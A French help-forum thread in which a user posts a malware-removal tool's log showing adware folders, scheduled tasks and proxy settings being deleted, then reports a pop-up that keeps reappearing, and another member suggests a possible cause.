C:\Users\utilisateur\Desktop\big_bang_empire.lnk => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\BigFarm.lnk => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\3333333 => déplacé(es) avec succès
C:\WINDOWS\system32\log => déplacé(es) avec succès
"C:\Program Files (x86)\Elex-tech" => non trouvé(e).
C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\NPASRE => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\00 => déplacé(es) avec succès
C:\Users\Public\Desktop\Mozilla Firefox.lnk => déplacé(es) avec succès
"C:\Users\utilisateur\AppData\Roaming\Elex-tech" => non trouvé(e).
C:\Program Files\MK => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1111 => déplacé(es) avec succès
C:\Users\Public\Documents\temp => déplacé(es) avec succès
C:\Users\Public\Documents\Google => déplacé(es) avec succès
C:\Users\Public\Documents\chrome => déplacé(es) avec succès
C:\Program Files (x86)\Bookness => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\8 mais 2017 => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\WANARE => déplacé(es) avec succès
C:\ProgramData\BIT => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\background_fault => déplacé(es) avec succès
C:\Program Files (x86)\AlphaGo => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1 => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1111111 => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-PG => déplacé(es) avec succès
C:\WINDOWS\psgo => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\SNAREA => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Kitty => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\WinSAPSvc => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\data.bin => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\SNARE => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\Firefox => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Firefox => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Doeye => déplacé(es) avec succès
C:\ProgramData\Apple => déplacé(es) avec succès
C:\Program Files (x86)\Doeye => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\33 => déplacé(es) avec succès
C:\Users\Public\Documents\report.dat => déplacé(es) avec succès
C:\Users\Public\Documents\temp.dat => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\11 => déplacé(es) avec succès
C:\Program Files (x86)\Firefox => déplacé(es) avec succès
C:\Program Files (x86)\BiaoJi => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\SMAH => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\SSMgre => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{416E13CC-6EFB-4784-92EC-7698F01AFE44} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{416E13CC-6EFB-4784-92EC-7698F01AFE44} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C035B091-00AF-4FCD-99EB-52A74E569DC2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C035B091-00AF-4FCD-99EB-52A74E569DC2} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C645F8A1-45D3-4EE3-9458-FBC53F0CA902} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C645F8A1-45D3-4EE3-9458-FBC53F0CA902} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-PG => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => clé supprimé(es) avec succès
"C:\windows\psgo" => non trouvé(e).
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Public\Desktop\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\BigFarm.lnk => non trouvé(e).
C:\Users\utilisateur\Desktop\big_bang_empire.lnk => non trouvé(e).
C:\Users\utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
"C:\Program Files (x86)\Doeye" => non trouvé(e).
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 294359 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 289405542 B
Java, Flash, Steam htmlcache => 6625 B
Windows/system/drivers => 342738587 B
Edge => 5023635 B
Chrome => 2695089 B
Firefox => 337777339 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 24275951 B
systemprofile32 => 20536428 B
LocalService => 46492 B
NetworkService => 6166932 B
utilisateur => 2739381046 B
RecycleBin => 1541214811 B
EmptyTemp: => 4.9 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
9 mai 2017 à 22:17
Bonne soirée,
9 mai 2017 à 22:24
9 mai 2017 à 23:27
Je n'ai pourtant rien téléchargé depuis, et suis seulement allé sur Youtube...
je vous remercie pour votre aide,
Brice
9 mai 2017 à 23:36
Tu n'as pas installé un logiciel du nom de cacaoweb ?
Une amie à souvent ça à cause de sa fille.
9 mai 2017 à 23:46
Non pas cacao web. Rien dans les extensions Chrome. Et aucun logiciel malveillant apparent.
J'ai fait un scan de malware, j'ai supprimé ce que le logiciel a trouvé.
Mais toujours cette fenêtre qui s'ouvre...